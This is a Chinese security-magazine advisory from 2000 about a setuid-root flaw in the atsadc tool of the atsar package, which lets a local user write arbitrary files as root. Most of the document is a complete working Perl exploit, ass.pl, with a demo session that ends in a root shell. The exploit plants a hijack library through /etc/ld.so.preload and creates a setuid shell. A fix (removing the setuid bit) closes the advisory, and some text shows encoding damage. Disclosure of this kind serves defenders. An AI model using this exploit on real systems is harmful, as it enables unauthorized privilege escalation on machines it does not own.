首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第7期->最新漏洞
日期:2000-05-23
发布日期: 2000-3-14
更新日期: 2000-3-14
受影响的系统:牋
AT Computing atsar 1.4-linux
牋? Halloween Linux 4.0
--------------------------------------------------------------------------------
描述:
atsar是一个Linux下的负载监视软件包,由AT Computing出品。这个软件包中有个程序atsadc
被设置了setuid root位。atsadc会接受一个参数作为输入文件名,并将打开这个文件,但是
它没有检查是否该用户有权限读写这个文件。当它以root身份打开或者创建目标文件后,攻击
在者可能写入任意内容到这个文件中。通过创建恶意的系统文件,攻击者可能本地获得root权
限。比如创建一个恶意的共享库,然后在/etc/ld.so.preload中增加这个库的路径,然后执行
一个设置了setuid root的程序(比如/usr/bin/passwd),然后恶意共享库就将被预装载并执行。
<* 来源: krahmer <krahmer@cs.uni-postdam.de>
牋牋牋牋燭ESO advisory -- atsadc牋(http://teso.scene.at)
*>
--------------------------------------------------------------------------------
测试程序:
牋牋liane:[bletchley]> id -a
牋牋uid=501(bletchley) gid=501(bletchley) groups=501(bletchley)
牋牋liane:[bletchley]> uname -a
牋牋Linux liane.c-skills.de 2.2.13-13 #21 Thu Mar 2 10:36:13 WET 2000 i686 unknown
牋牋liane:[bletchley]> stat `which atsadc`
牋牋牋File: "/usr/sbin/atsadc"
牋牋牋Size: 16000 Filetype: Regular File
牋牋牋Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
牋牋Device: 3,1 Inode: 117038 Links: 1
牋牋Access: Thu Mar 9 10:09:37 2000(00000.01:02:49)
牋牋Modify: Tue Nov 9 23:57:50 1999(00120.11:14:36)
牋牋Change: Tue Mar 7 14:55:23 2000(00001.20:17:03)
牋牋liane:[bletchley]> cd atsar-hack/
牋牋liane:[atsar-hack]> ./ass.pl
牋牋Creating hijack-lib ...
牋牋Compiling hijack-lib ...
牋牋Compile shell ...
牋牋Invoking vulnerable program (atsadc)...
牋牋sh: error in loading shared libraries:
牋牋sh: error in loading shared libraries:
牋牋Welcome. But as always: BEHAVE!
牋牋sh-2.03# id -a
牋牋uid=0(root) gid=0(root) groups=501(bletchley)
牋牋sh-2.03#
---------------------------- ass.pl ------------------------------------------
#!/usr/bin/perl
# Halloween 4 local root-exploit, other distros are maybe
# affected as well. (atsadc program)
# (C) 2000 C-skills development, S. Krahmer under the GPL
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
# Exploit will create /etc/ld.so.preload, so it should NOT exist
# already. THIS FILE WILL BE LOST!
# ! USE IT AT YOUR OWN RISK !
# For educational purposes only.
print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
int time(void *v)
{
牋牋chown("/tmp/boomsh", 0, 0);
牋牋chmod("/tmp/boomsh", 06755);
牋牋unlink("/etc/ld.so.preload");
牋牋exit(1);
}
_EOF_
close O;
print "Compiling hijack-lib ...\n";
$foo = `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
$foo = `cc -shared /tmp/boom.o -o /tmp/boom.so`;
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main()
{
牋牋char *a[] = {"/bin/sh", 0};
牋牋setuid(0); setregid(0, 0);
牋牋execve(a[0], a, 0);
牋牋return 0;
}
_EOF2_
close O;
print "Compile shell ...\n";
$foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;
umask 0;
print "Invoking vulnerable program (atsadc)...\n";
$foo = `atsadc 2 1 /etc/ld.so.preload`;
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
$foo = `/usr/bin/passwd`;
# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
--------------------------------------------------------------------------------
建议:
牋牋临时解决办法: chmod u-s atsadc
版权所有,未经许可,不得转载